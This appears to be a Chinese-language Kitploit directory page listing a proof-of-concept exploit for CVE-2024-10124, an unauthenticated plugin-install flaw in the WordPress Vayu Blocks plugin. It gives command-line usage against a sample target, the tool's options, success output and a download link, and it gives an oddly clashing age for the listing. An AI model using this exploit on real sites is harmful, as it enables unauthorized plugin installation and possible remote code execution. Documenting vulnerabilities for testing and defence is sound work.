Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-10124-Poc — 针对 WordPress Vayu Blocks 插件中 CVE-2024-10124 的概念验证漏洞利用程序,允许未经授权的插件安装和激活,从而可能实现远程代码执行。 | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-10124-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubnxploited/cve-2024-10124-poc

CVE-2024-10124-Poc

针对 WordPress Vayu Blocks 插件中 CVE-2024-10124 的概念验证漏洞利用程序,允许未经授权的插件安装和激活,从而可能实现远程代码执行。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-10124-Poc

WordPress 的 Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce 插件在所有版本(包括 1.1.1)中,由于 tp_install() 函数缺少权限检查,存在未授权安装和激活任意插件的漏洞。这使得未经身份验证的攻击者能够安装和激活任意插件,如果另一个易受攻击的插件已被安装并激活,则可能被利用来实现远程代码执行。该漏洞已在 1.1.1 版本中进行了部分修复。

示例场景

检查漏洞

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version

这将检查 vayu-blocks 插件的版本,以确定该站点是否存在漏洞。

安装插件(默认)

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress

这将安装默认插件 hello-dolly

安装指定插件

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p plugin_name

这将在目标站点上安装 plugin_name 插件。

🔍命令描述示例
🌐-u or --url指定 WordPress 站点的目标 URL。-u http://192.168.100.74/wordpress
🔒--check-version检查站点是否基于版本存在漏洞。-u http://192.168.100.74/wordpress --check-version
⚙️-p or --plugin指定插件名称(默认为 hello-dolly)。-u http://192.168.100.74/wordpress -p plugin_name
root@kitploit:~
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL (e.g., http://192.168.100.74/wordpress)
  -p PLUGIN, --plugin PLUGIN
                        Plugin name (default: hello-dolly)
  --check-version       Check if the site is vulnerable based on plugin version

输出

root@kitploit:~
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"

注意:

此脚本仅用于教育目的。作者不对因滥用此脚本而造成的任何损害负责。

下载工具